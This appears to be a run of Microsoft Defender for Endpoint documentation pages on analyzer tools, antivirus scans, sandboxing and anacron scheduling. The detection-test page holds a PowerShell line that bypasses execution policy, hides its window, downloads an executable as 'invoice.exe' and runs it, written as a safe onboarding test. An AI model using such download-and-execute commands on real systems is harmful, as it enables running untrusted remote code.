-Syntax that can be used to limit the number of events being reported by the auditD plugin. This option sets the rate limit globally for AuditD causing a drop in all the audit events. When the limiter is enabled the number of auditd events are limited to 2500 events/sec. This option can be used in cases where we see high CPU usage from AuditD side.
-
-> [!NOTE]
-> This functionality exists for Linux only.
-
-```console
--h, --help show this help message and exit--e <true/false>, --enable <true/false> enable/disable the rate limit with default values
-```
-
-Usage example: `sudo ./mde_support_tool.sh ratelimit -e true`
-
-> [!NOTE]
-> This functionality should be carefully used as limits the number of events being reported by the auditd subsystem as a whole. This could reduces the number of events for other subscribers as well.
-
-### AuditD Skip Faulty Rules
-
-This option enables you to skip the faulty rules added in the auditd rules file while loading them. This option allows the auditd subsystem to continue loading rules even if there's a faulty rule. This option summarizes the results of loading the rules. In the background, this option runs the auditctl with the -c option.
-
-> [!NOTE]
-> This functionality is only available on Linux.
-
-```console
--h, --help show this help message and exit--e <true/false>, --enable <true/false> enable/disable the option to skip the faulty rules. In case no argumanet is passed, the option will be true by default.
-```
-
-Usage example: `sudo ./mde_support_tool.sh skipfaultyrules -e true`
-
-> [!NOTE]
-> This functionality will be skipping the faulty rules. The faulty rule then needs to be further identified and fixed.
-
-## Result package contents on macOS and Linux
--- report.html-
- Description: The main HTML output file that contains the findings and guidance that the analyzer script run on the machine can produce.
--- mde_diagnostic.zip-
- Description: Same diagnostic output that gets generated when running *mdatp diagnostic create* on either [macOS](mac-resources.md#collecting-diagnostic-information) or [Linux](linux-resources.md#collect-diagnostic-information).
--- mde.xml-
- Description: XML output that is generated while running and is used to build the html report file.
--- Processes_information.txt-
- Description: contains the details of the running Microsoft Defender for Endpoint related processes on the system.
--- Log.txt-
- Description: contains the same log messages written on screen during the data collection.
--- Health.txt-
- Description: The same basic health output that is shown when running *mdatp health* command.
--- Events.xml-
- Description: Additional XML file used by the analyzer when building the HTML report.
--- Audited_info.txt-
- Description: details on audited service and related components for [Linux](/microsoft-365/security/defender-endpoint/linux-resources) OS.
--- perf_benchmark.tar.gz-
- Description: The performance test reports. You'll see this only if you're using the performance parameter.
security Run Analyzer Windows https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-analyzer-windows.md
- Title: Run the client analyzer on Windows
-description: Learn how to run the Microsoft Defender for Endpoint Client Analyzer on Windows.
--- NOCSH------- m365-security-- tier2-- mde-ngp-- Previously updated : 11/01/2023--
-# Run the client analyzer on Windows
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-## Option 1: Live response
-
-You can collect the Defender for Endpoint analyzer support logs remotely using [Live Response](/microsoft-365/security/defender-endpoint/troubleshoot-collect-support-log).
-
-## Option 2: Run MDE Client Analyzer locally
-
-1. Download the [MDE Client Analyzer tool](https://aka.ms/mdatpanalyzer) or [Beta MDE Client Analyzer tool](https://aka.ms/BetaMDEAnalyzer) to the Windows device you want to investigate.
-
- The file is saved to your Downloads folder by default.
-
-2. Open your Downloads folder, right-click on **MDEClientAnalyzer.zip**, and then select **Properties**.
-
-4. Extract the contents of MDEClientAnalyzer.zip to an available folder.
-
-5. Open a command line with administrator permissions:
-
- 1. Go to **Start** and type **cmd**.
- 1. Right-click **Command prompt** and select **Run as administrator**.
-
-6. Type the following command and then press **Enter**:
-
- ```cmd
- *DrivePath*\MDEClientAnalyzer.cmd
- ```
-
- Replace *DrivePath* with the path where you extracted MDEClientAnalyzer, for example:
-
- ```cmd
- C:\Work\tools\MDEClientAnalyzer\MDEClientAnalyzer.cmd
- ```
-
-In addition to the previous procedure, you can also [collect the analyzer support logs using live response.](troubleshoot-collect-support-log.md).
-
-> [!NOTE]
-> On Windows 10 and 11, Windows Server 2019 and 2022, or Windows Server 2012R2 and 2016 with the [modern unified solution](configure-server-endpoints.md#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution) installed, the client analyzer script calls into an executable file called `MDEClientAnalyzer.exe` to run the connectivity tests to cloud service URLs.
->
-> On Windows 8.1, Windows Server 2016 or any previous OS edition where Microsoft Monitoring Agent (MMA) is used for onboarding, the client analyzer script calls into an executable file called `MDEClientAnalyzerPreviousVersion.exe` to run connectivity tests for Command and Control (CnC) URLs while also calling into Microsoft Monitoring Agent connectivity tool `TestCloudConnection.exe` for Cyber Data channel URLs.
-
-## Important points to keep in mind
-
-All the PowerShell scripts and modules included with the analyzer are Microsoft-signed. If files were modified in any way, then the analyzer is expected to exit with the following error:
--
-If you see this error, the issuerInfo.txt output contains detailed information about why this happened and the affected file:
--
-Example contents after MDEClientAnalyzer.ps1 is modified:
--
-## Result package contents on Windows
-
-> [!NOTE]
-> The exact files captured may change depending on factors such as:
->
-> - The version of windows on which the analyzer is run.
-> - Event log channel availability on the machine.
-> - The start state of the EDR sensor (Sense is stopped if machine is not yet onboarded).
-> - If an advanced troubleshooting parameter was used with the analyzer command.
-
-By default, the unpacked MDEClientAnalyzerResult.zip file contains the following items.
--- MDEClientAnalyzer.htm-
- This is the main HTML output file, which will contain the findings and guidance that the analyzer script run on the machine can produce.
--- SystemInfoLogs [Folder]-
- - AddRemovePrograms.csv
-
- Description: List of x64 installed software on x64 OS collected from registry.
-
- - AddRemoveProgramsWOW64.csv
-
- Description: List of x86 installed software on x64 OS collected from registry.
-
- - CertValidate.log
-
- Description: Detailed result from certificate revocation executed by calling into [CertUtil](/windows-server/administration/windows-commands/certutil).
-
- - dsregcmd.txt
-
- Description: Output from running [dsregcmd](/azure/active-directory/devices/troubleshoot-device-dsregcmd). This provides details about the Microsoft Entra status of the machine.
-
- - IFEO.txt
-
- Description: Output of [Image File Execution Options](/previous-versions/windows/desktop/xperf/image-file-execution-options) configured on the machine
-
- - MDEClientAnalyzer.txt
-
- Description: This is verbose text file showing with details of the analyzer script execution.
-
- - MDEClientAnalyzer.xml
-
- Description: XML format containing the analyzer script findings.
-
- - RegOnboardedInfoCurrent.Json
-
- Description: The onboarded machine information gathered in JSON format from the registry.
-
- - RegOnboardingInfoPolicy.Json
-
- Description: The onboarding policy configuration gathered in JSON format from the registry.
-
- - SCHANNEL.txt
-
- Description: Details about [SCHANNEL configuration](/windows-server/security/tls/manage-tls) applied to the machine such gathered from registry.
-
- - SessionManager.txt
-
- Description: Session Manager specific settings gather from registry.
-
- - SSL_00010002.txt
-
- Description: Details about [SSL configuration](/windows-server/security/tls/manage-tls) applied to the machine gathered from registry.
--- EventLogs [Folder]-
- - utc.evtx
-
- Description: Export of DiagTrack event log
-
- - senseIR.evtx
-
- Description: Export of the Automated Investigation event log
-
- - sense.evtx
-
- Description: Export of the Sensor main event log
-
- - OperationsManager.evtx
-
- Description: Export of the Microsoft Monitoring Agent event log
--- MdeConfigMgrLogs [Folder]-
- - SecurityManagementConfiguration.json
-
- Description: Configurations sent from MEM (Microsoft Endpoint Manager) for enforcement.
-
- - policies.json
-
- Description: Policies settings to be enforced on the device.
-
- - report_xxx.json
-
- Description: Corresponding enforcement results.
--
-## See also
--- [Client analyzer overview](overview-client-analyzer.md)-- [Download and run the client analyzer](download-client-analyzer.md)-- [Data collection for advanced troubleshooting on Windows](data-collection-analyzer.md)-- [Understand the analyzer HTML report](analyzer-report.md)--
security Run Detection Test https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-detection-test.md
- Title: Run a detection test on a device recently onboarded to Microsoft Defender for Endpoint
-description: Run the detection test script on a device recently onboarded to the Microsoft Defender for Endpoint service to verify that it's properly added.
--- Previously updated : 04/03/2024---- m365-security-- tier1----
-# Run a detection test on a device recently onboarded to Microsoft Defender for Endpoint
---
-**Applies to:**
-- Windows 11-- Supported Windows 10 versions-- Windows Server 2012 R2-- Windows Server 2016-- Windows Server, version 1803-- Windows Server 2019-- Windows Server 2022-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-When you add a device to the Microsoft Defender for Endpoint service for management, it's referred to as onboarding. Onboarding allows devices to report signals about their health status to the service.
-
-Verifying that a device is added to the service successfully is a critical step in the entire deployment process. It helps ensure that all the devices expected are being managed.
-
-## Verify Microsoft Defender for Endpoint onboarding of a device using a PowerShell detection test
-
-Run the following PowerShell script on a newly onboarded device to verify that it's properly reporting to the Defender for Endpoint service.
-
-1. On the device, open Command Prompt as an administrator.
-
-2. At the prompt, copy and run the following command:
-
- ```powershell
- powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
- ```
-
-The Command Prompt window closes automatically. If successful, a new alert appears in the portal for the onboarded device in about 10 minutes.
-
-> [!NOTE]
-> You can also use the EICAR test string to perform this test. Create a text file, paste the EICAR line, and save the file as an executable file to your endpoint's local drive. You will receive a test endpoint notification and an alert in the Microsoft Defender portal.
-
-## Related articles
--- [Onboard Windows devices](configure-endpoints.md)-- [Onboard servers](configure-server-endpoints.md)-- [Troubleshoot Microsoft Defender for Endpoint onboarding issues](/microsoft-365/security/defender-endpoint/troubleshoot-onboarding)-
security Run Scan Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-scan-microsoft-defender-antivirus.md
- Title: Run and customize on-demand scans in Microsoft Defender Antivirus
-description: Run and configure on-demand scans using PowerShell, Windows Management Instrumentation, or individually on endpoints with the Windows Security app
----- Previously updated : 12/15/2023------ m365-security-- tier2-- mde-ngp--
-# Configure and run on-demand Microsoft Defender Antivirus scans
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)-- [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md)-
-You can run an on-demand scan on individual endpoints. These scans will start immediately, and you can define parameters for the scan, such as the location or type. When you run a scan, you can choose from among three types: Quick scan, full scan, and custom scan. In most cases, use a quick scan. A quick scan looks at all the locations where there could be malware registered to start with the system, such as registry keys and known Windows startup folders.
-
-Combined with always-on, real-time protection, which reviews files when they are opened and closed, and whenever a user navigates to a folder, a quick scan helps provide strong protection against malware that starts with the system and kernel-level malware. In most cases, a quick scan is sufficient and is the recommended option for scheduled or on-demand scans. [Learn more about scan types](schedule-antivirus-scans.md#comparing-the-quick-scan-full-scan-and-custom-scan).
-
-> [!IMPORTANT]
-> Microsoft Defender Antivirus runs in the context of the [LocalSystem](/windows/win32/services/localsystem-account) account when performing a local scan. For network scans, it uses the context of the device account. If the domain device account doesn't have appropriate permissions to access the share, the scan won't work. Ensure that the device has permissions to access the network share.
-
-## Use Microsoft Defender portal to run a scan
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com/)) and sign-in.
-2. Go to the **device page** that you would like to run a remote scan.
-3. Click on the ellipses **(...)**.
-4. Click on **Run Antivirus Scan**.
-5. Under **Select scan type**, select the radio button for **Quick Scan** or **Full Scan**.
-6. Add a comment.
-7. Click on **Confirm**.
-
-To check on the status:
-
-1. Under **Actions & submissions**, select **Action Center** and then select **History** tab.
-2. Click on **Filters**.
-3. Under the **Action Type**, check the box for **Start antivirus scan**.
-4. Click on **Apply**.
-5. Select one of the **radio button**.
-6. Under **Action Status**, you'll see the status such as **Completed**.
-
-To check on the detections, see [Review the results of Microsoft Defender Antivirus scans | Microsoft Learn](review-scan-results-microsoft-defender-antivirus.md)
-
-## Use Microsoft Intune to run a scan
-
-### Use endpoint security to run a scan on Windows devices
-
-1. Go to the Microsoft Intune admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)) and sign-in.
-
-2. Choose **Endpoint security** \> **Antivirus**.
-
-3. In the list of tabs, select **Windows 10 unhealthy endpoints** or **Windows 11 unhealthy endpoints**.
-
-4. From the list of actions provided, select **Quick Scan** (recommended) or **Full Scan**.
-
- [![Scan options on the Windows 10 unhealthy endpoints tab.](media/mem-antivirus-scan-on-demand.png)](media/mem-antivirus-scan-on-demand.png#lightbox)
-
-> [!TIP]
-> For more information about using Microsoft Configuration Manager to run a scan, see [Antimalware and firewall tasks: How to perform an on-demand scan](/configmgr/protect/deploy-use/endpoint-antimalware-firewall#how-to-perform-an-on-demand-scan-of-computers).
-
-### Use devices to run a scan on a single device
-
-1. Go to the Microsoft Intune admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)) and sign-in.
-
-2. From the sidebar, select **Devices** \> **All Devices** and choose the device you want to scan.
-
-3. Select **...More** and select **Quick Scan** (recommended) or **Full Scan** from the options.
-
-## Use the Windows Security app to run a scan
-
-For instructions on running a scan on individual endpoints, see [Run a scan in the Windows Security app](microsoft-defender-security-center-antivirus.md).
-
-## Use PowerShell cmdlets to run a scan
-
-Use the following cmdlet:
--
-```PowerShell
-Start-MpScan
-```
-
-## Use PowerShell cmdlets to run a quick scan without excluding antivirus exclusions
-
-Use the following cmdlet:
-
-```PowerShell
-Set-MpPreference -QuickScanIncludeExclusions 1
-```
-
-> [!NOTE]
-> A value of `1` enables the inclusion of the antivirus excluded processes, folders, files, and extensions. A value of `0` (default) disables the inclusion of the antivirus excluded processes, folders, files, and extensions.
-
-For more information on how to use PowerShell with Microsoft Defender Antivirus, see [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Defender Antivirus cmdlets](/powershell/module/defender/).
-
-## Use the mpcmdrun.exe command-line utility to run a scan
-
-Use the following `-scan` parameter:
-
-```console
-mpcmdrun.exe -scan -scantype 1
-```
-
-For more information on how to use the tool and other parameters, including starting a full scan or defining paths, see [Use the mpcmdrun.exe commandline tool to configure and manage Microsoft Defender Antivirus](command-line-arguments-microsoft-defender-antivirus.md).
-
-## Use Windows Management Instruction (WMI) to run a scan
-
-Use the [**Start** method](/previous-versions/windows/desktop/defender/start-msft-mpscan) of the **MSFT_MpScan** class.
-
-For more information about which parameters are allowed, see [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal)
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
->
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
security Safety Scanner Download https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/safety-scanner-download.md
- Title: Microsoft Safety Scanner Download-
-description: Get the Microsoft Safety Scanner tool to find and remove malware from Windows computers.
-keywords: security, malware
--
-ms.sitesec: library
------ m365-security-- tier2- Previously updated : 03/08/2024---
-# Microsoft Safety Scanner Download
-
-Microsoft Safety Scanner is a scan tool designed to find and remove malware from Windows computers. Simply download it and run a scan to find malware and try to reverse changes made by identified threats.
--- **[Download Microsoft Safety Scanner (32-bit)](https://go.microsoft.com/fwlink/?LinkId=212733)**--- **[Download Microsoft Safety Scanner (64-bit)](https://go.microsoft.com/fwlink/?LinkId=212732)**-
-> [!NOTE]
-> Safety Scanner is exclusively SHA-2 signed. Your devices must be updated to support SHA-2 in order to run Safety Scanner. To learn more, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](https://support.microsoft.com/help/4472027/2019-sha-2-code-signing-support-requirement-for-windows-and-wsus).
-
-## Important information
--- The security intelligence update version of the Microsoft Safety Scanner matches the version described [in this web page](https://www.microsoft.com/wdsi/definitions).--- Microsoft Safety Scanner only scans when manually triggered. Safety Scanner expires 10 days after being downloaded. To rerun a scan with the latest anti-malware definitions, download and run Safety Scanner again. We recommend that you always download the latest version of this tool before each scan.--- Safety Scanner is a portable executable and doesn't appear in the Windows Start menu or as an icon on the desktop. Note where you saved this download.--- This tool doesn't replace your antimalware product. For real-time protection with automatic updates, use [Microsoft Defender Antivirus on Windows 11, Windows 10, and Windows 8](https://www.microsoft.com/windows/comprehensive-security) or [Microsoft Security Essentials on Windows 7](https://support.microsoft.com/help/14210/security-essentials-download). These antimalware products also provide powerful malware removal capabilities. If you're having difficulties removing malware with these products, you can refer to our help on [removing difficult threats](https://www.microsoft.com/wdsi/help/troubleshooting-infection).-
-## System requirements
-
-Safety Scanner helps remove malicious software from computers running Windows 11, Windows 10, Windows 10 Tech Preview, Windows 8.1, Windows 8, Windows 7, Windows Server 2019, Windows Server 2016, Windows Server Tech Preview, Windows Server 2012 R2, Windows Server 2012, or Windows Server 2008 R2. For details, refer to the [Microsoft Lifecycle Policy](/lifecycle/).
-
-## How to run a scan
-
-1. Download this tool and open it.
-2. Select the type of scan that you want to run and start the scan.
-3. Review the scan results displayed on screen. For detailed detection results, view the log at **%SYSTEMROOT%\debug\msert.log**.
-
-To remove this tool, delete the executable file (msert.exe by default).
-
-For more information about the Safety Scanner, see the support article on [how to troubleshoot problems using Safety Scanner](https://support.microsoft.com/kb/2520970).
-
-## Related resources
--- [Troubleshooting Safety Scanner](https://support.microsoft.com/help/2520970/how-to-troubleshoot-an-error-when-you-run-the-microsoft-safety-scanner)-- [Microsoft Defender Antivirus](https://www.microsoft.com/windows/comprehensive-security)-- [Microsoft Security Essentials](https://support.microsoft.com/help/14210/security-essentials-download)-- [Removing difficult threats](https://support.microsoft.com/help/4466982/windows-10-troubleshoot-problems-with-detecting-and-removing-malware)-- [Submit file for malware analysis](https://www.microsoft.com/wdsi/filesubmission)-- [Microsoft antimalware and threat protection solutions](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint)
security Sandbox Mdav https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/sandbox-mdav.md
- Title: Run Microsoft Defender Antivirus in a sandbox environment
-description: This article describes how to run Microsoft Defender Antivirus in a sandbox to further strengthen against tampering.
----- Previously updated : 02/26/2024------ m365-security-- tier2-- mde-ngp--
-# Run Microsoft Defender Antivirus in a sandbox
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md)-
-**Platforms:**
--- Windows-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/WindowsForBusiness/windows-atp?ocid=docs-wdatp-configureendpointsscript-abovefoldlink)
-
-This article describes how to run Microsoft Defender Antivirus in a sandbox environment for enhanced protection against tampering.
-
-Microsoft Defender Antivirus with its built-in antivirus capabilities can run within a sandbox on Windows as of October 26, 2018. It was the first complete antivirus solution to have this capability and continues to lead the industry in raising the bar for security.
-
-## Prerequisites
-
-Before you begin, you must meet the following requirements:
--- Microsoft Defender Antivirus (active mode)-- Windows 11 or Windows 10 version 1703 or newer-- Windows Server 2022 or Windows Server 2019 or Windows Server 2016 or newer-
-## Why run Microsoft Defender Antivirus in a sandbox?
-
-Security researchers, both inside and outside of Microsoft, have previously identified ways that an attacker can take advantage of vulnerabilities in Microsoft Defender AntivirusΓÇÖs content parsers that could enable arbitrary code execution. To inspect the whole system for malicious content and artifacts, the antivirus runs with high privileges (Local System, NT Authority\SYSTEM), making it a target for attacks.
-
-Whereas escalation of privilege from a sandbox is so much difficult on the latest versions of Windows 10 or newer and, running Microsoft Defender Antivirus in a sandbox ensures that in the unlikely event of a compromise, malicious actions are limited to the isolated environment, protecting the rest of the system from harm. This is part of MicrosoftΓÇÖs continued investment to stay ahead of attackers through security innovations.
-
-## Implementing sandbox for Microsoft Defender Antivirus
-
-Modern anti-malware products inspect many inputs, for example, files on disk, streams of data in memory and behavioral events in real-time. Many of these capabilities require full access to the resources in question. The first major sandboxing effort was related to layering Microsoft Defender AntivirusΓÇÖs inspection capabilities into the components that absolutely must run with full privileges and the components that can be sandboxed. The goal for the sandboxed components was to ensure that they encompassed the highest risk functionality like scanning untrusted input, expanding containers, and so on. At the same time, we had to minimize the number of interactions between the two layers in order to avoid a substantial performance cost.
-
-Resource usage is also another problem that requires significant investments, both privileged process and sandbox process need to have access to Security Intelligence updates, other detections and remediation metadata. To avoid duplication and preserve strong security guarantees that are to avoid unsafe ways to share state or to introduce significant runtime cost of passing data/content between the processes, we use a model where most protection data is hosted in memory-mapped files that are read-only at runtime. This means protection data can be hosted into multiple processes without any overhead.
-
-## Enable sandboxing for Microsoft Defender Antivirus
-
-You can follow these steps to enable sandboxing by setting a machine-wide environment variable:
-
-1. Run the following command as an admin in PowerShell or CMD:
-
- ```powershell
- setx /M MP_FORCE_USE_SANDBOX 1
- ```
-
- :::image type="content" source="medilet details to enable sanbox.":::
-
-2. Restart the device. Once you've restarted, you'll see a new process besides MsMpEng.exe that is `MsMpEngCP.exe` in the following folders:
-
- |Path|Process|Description|
- ||||
- |C:\ProgramData\Microsoft\Windows Defender\Scans |MsMpEngCP.exe | Anti-malware Service Executable Content Process |
- |C:\Users\All Users\Microsoft\Windows Defender\Scans |MsMpEngCP.exe | Anti-malware Service Executable Content Process |
-
- >[!NOTE]
- > CP in `MsMpEngCP.exe` is the content process.
-
-### Disable sandboxing
-
-To disable sandboxing for Microsoft Defender Antivirus, run the following command as an admin in PowerShell or CMD:
-
-```powershell
-setx /M MP_FORCE_USE_SANDBOX 0
-```
-
-## FAQs
-
-### What happens when sandbox is disabled?
-
-Microsoft Defender Antivirus performs an in-proc fallback that hosts content scanning in the privileged/parent process to provide protection.
-
-### How is the content process strengthened?
-
-The content processes, which run with low privileges, also aggressively use all available mitigation policies to reduce the surface attack. They enable and prevent runtime changes for modern exploit mitigation techniques such as Data Execution Prevention (DEP), Address space layout randomization (ASLR), and Control Flow Guard (CFG). They also disable Win32K system calls and all extensibility points, as well as enforce that only signed and trusted code is loaded.
-
-**Performance of MDAV with sandbox enabled**
-
-Performance is often the main concern raised around sandboxing, especially given that anti-malware products are in many critical paths like synchronously inspecting file operations and processing and aggregating or matching large numbers of runtime events. To ensure that performance doesnΓÇÖt degrade, we had to minimize the number of interactions between the sandbox and the privileged process. At the same time, only perform these interactions in key moments where their cost wouldn't be significant, for example, when I/O is being performed.
-
-Microsoft Defender Antivirus makes an orchestrated effort to avoid unnecessary I/O, for example, minimizing the amount of data read for every inspected file is paramount in maintaining good performance, especially on older hardware (rotational disk, remote resources). Thus, it was crucial to maintain a model where the sandbox can request data for inspection as needed, instead of passing the entire content.
-
-**Reliability of MDAV with sandbox enabled**
-
-> [!NOTE]
-> Passing handles to the sandbox (to avoid the cost of passing the actual content) isnΓÇÖt an option because there are many scenarios, such as real-time inspection, AMSI, etc., where thereΓÇÖs no ΓÇÿsharableΓÇÖ handle that can be used by the sandbox without granting significant privileges, which decreases the security.
-
-Another significant concern around sandboxing is related to the inter-process communication mechanism to avoid potential problems like deadlocks and priority inversions. The communication shouldn't introduce any potential bottlenecks, either by throttling the caller or by limiting the number of concurrent requests that can be processed. Moreover, the sandbox process shouldnΓÇÖt trigger inspection operations by itself. All inspections should happen without triggering more scans. This requires fully controlling the capabilities of the sandbox and ensuring that no unexpected operations can be triggered. Low-privilege AppContainers are the perfect way to implement strong guarantees because the capabilities-based model will allow fine-grained control on specifying what the sandbox process can do.
-
-**Remediation of MDAV with sandbox enabled**
-
-Lastly, a significant challenge from the security perspective is related to content remediation or disinfection. Given the sensitive nature of the action (attempts to restore a binary to the original preinfection content), we needed to ensure that this happens with high privileges in order to mitigate cases in which the content process (sandbox) could be compromised and disinfection could be used to modify the detected binary in unexpected ways.
-
-### What to do while troubleshooting the MsMpEng.CP.exe process, if it starts and stops after a few minutes?
-
-Collect the [support diagnostic logs](collect-diagnostic-data.md) and any relevant dumps/crash information if there are associated Windows Error Reporting (WER) events around the time the process stops.
security Schedule Antivirus Scan In Mde https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/schedule-antivirus-scan-in-mde.md
- Title: How to schedule an antivirus scan using Anacron in Microsoft Defender for Endpoint on Linux
-description: Learn how to schedule an antivirus scan in Microsoft Defender for Endpoint on Linux for better protection of your organization's assets.
--- Previously updated : 12/02/2023---- m365-security-- tier3-- mde-linux----
-# Schedule an antivirus scan using Anacron in Microsoft Defender for Endpoint on Linux
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)--
-To run a scan of Microsoft Defender Antivirus for Linux, see [Supported Commands](/microsoft-365/security/defender-endpoint/linux-resources#supported-commands).
-
-> [!NOTE]
-> This article supports Microsoft Defender for Endpoint on Linux for Red Hat Enterprise Linux distributions (RHEL).
-
-## System requirements
-
-See the following system requirements needed to schedule Microsoft Defender Antivirus scan in Microsoft Defender Endpoint on Linux.
--- Linux server distributions and versions: Red Hat Enterprise Linux 7.2 or higher.-- The **FANOTIFY** option in kernel must be enabled.-
-## Scheduling Microsoft Defender Antivirus scan in Red Hat Linux
-
-You can schedule cron jobs to initiate Microsoft Defender Antivirus scans on a schedule. For more information, see [How to schedule scans with Microsoft Defender for Endpoint on Linux](linux-schedule-scan-mde.md). This process works well if the device is always up and running.
-
-But if the Linux devices are shut down or offline during the cron schedule, the scan won't run. In these situations, you can use **anacron** to read the timestamp and find the last executed job. If the device was shut down during the scheduled cron job, it needs to wait until the next scheduled time. By using **anacron**, the system will detect the last time the scan was run. If the device didn't run the cron job, it will automatically start it.
-
-### Schedule Microsoft Defender Antivirus scans in Red Hat Linux
-
-Use the following steps to schedule scans:
-
-1. Connect to the RedHat server using PuTTY.
-1. Edit the anacron file:
- ```shell
- vi /etc/anacron
- ```
-
-1. :::image type="content" source="media/vi-etc-anacron.png" alt-text="Sample Anacron Job Linux." lightbox="media/vi-etc-anacron.png" link="media/vi-etc-anacron.png":::
-
- ```shell
- # /etc/anacrontab: configuration file for anacron
- # See anacron (8) and anacrontab (5) for details.
- SHELL=/bin/sh
- PATH=/sbin:/bin:/usr/sbin:/usr/bin
- RANDOM_DELAY=45
- # Anacron jobs will start between 8pm and 11pm.
- START_HOURS_RANGE=20-23
- # delay will be 5 minutes + RANDOM_DELAY for cron.daily
- ```
-
-1. Note the following items in the file.
- 1. **Shell:** Shell is referred as `/bin/sh`, and not as `/bin/bash`. Remember when writing the jobs.
- 1. **RANDOM_DELAY:** Describes the maximum time in minutes for the job. This value is used to offset the jobs so there wouldn't be too many jobs running at the same time. Using this delay is ideal for VDI solutions.
- 1. **START_HOURS_RANGE:** Describes the time range to run the job.
- 1. **cron.daily:** Describes 1 as the period of days required for the frequency of job executions. 5 is the delay in minutes that anacron waits after the device restarts.
-
-1. Review look at the anacron jobs:
-
- ```shell
- ls -lh /etc/cron*
- ```
-
- :::image type="content" source="media/vi-etc-anacron.png" alt-text="Sample Anacron Job Linux." lightbox="media/vi-etc-anacron.png" link="media/vi-etc-anacron.png":::
-
- ```shell
- [root@redhat7 /] # ls -lh /etc/cron*
- - rw
- - rw - r
-
- /etc/cron.d:
- total 28k
- - rw - r
- - rw - r
- - rw - r
- - rw - r
- - rw - r
- - rw - r
- - rw
-
- /etc/cron.daily:
- total 24k
- - rwxr - xr - x. 1 root root 127 Jun 14 16:49 avscandaily
- - rwx
- - rwxr - xr - x. 1 root root 618 Jul 10 2018 man-db.cron
- - rwx
- - rwx
- - rwxr - xr - x. 1 root root 114 Apr 8 2021 rhui-update-client
-
- /etc/cron.hourly:
- total 8.0k
- - rwxr - xr - x. 1 root root 392 Nov 30 2021 0anacron
- - rwxr - xr - x. 1 root root 131 Jun 14 17:05 update
-
- /etc/cron.monthly:
- total 0
- - rwxr - xr - x. 1 root root 0 Jun 14 17:47 mdatpupdate
-
- /etc/cron.weekly:
- total 0
- ```
-
-1. Ignore the `/etc/cron.d` directory, you will see `/etc/cron.daily, hourly, monthly, and weekly`.
-
-1. To schedule a weekly antivirus scan, you can create a file (Job) under the ```/etc/cron.weekly``` directory.
-
- ```shell
- cd /etc/cron.weekly
-
- vi mdavfullscan
-
- Press Insert
- ```
-
- :::image type="content" source="mediavfullscan.png" alt-text="weekly antivirus scans":::
-
- ```shell
- #!/bin/sh
- set -e
- echo $(date) "Time Scan Begins" >>/logs/mdav_avacron_full_scan.log
- /bin/mdatp scan full >> /logs/mdav_avacron_full_scan.log
